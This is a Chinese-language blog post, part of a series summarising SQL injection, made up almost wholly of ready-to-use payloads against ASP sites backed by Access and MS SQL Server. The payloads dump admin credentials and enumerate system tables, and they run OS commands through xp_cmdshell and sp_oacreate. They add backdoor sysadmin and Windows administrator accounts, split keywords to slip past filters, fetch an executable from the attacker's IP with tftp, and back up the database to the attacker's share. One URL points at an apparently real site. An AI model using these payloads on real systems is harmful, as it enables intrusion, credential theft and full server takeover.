SQL注射总结(3)

可以得到用户名 依次可以得到密码。。。。。假设存在user_id username ,password 等字段

Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

       (union语句到处风靡啊,access也好用

  暴库特殊技巧::%5c='/' 或者把/和/ 修改%5提交

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

_blank>http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--

_blank>http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)

_blank>http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--


  得到了web路径d:/xxxx,接下来:

_blank>http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
_blank>http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--


  传统的存在xp_cmdshell的测试过程:

;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes / active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net localgroup administrators swap/add'

_blank>http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/'
;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat'
如果被限制则可以。
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')

关键字:软件  服务器  qq  os  msn  dos   美女 电影 小说 音乐 无极 汽车 MP3

阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/metababy/article/details/564895
个人分类: 通用算法
上一篇SQL注射总结(2)
下一篇SQL注射总结(4)
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭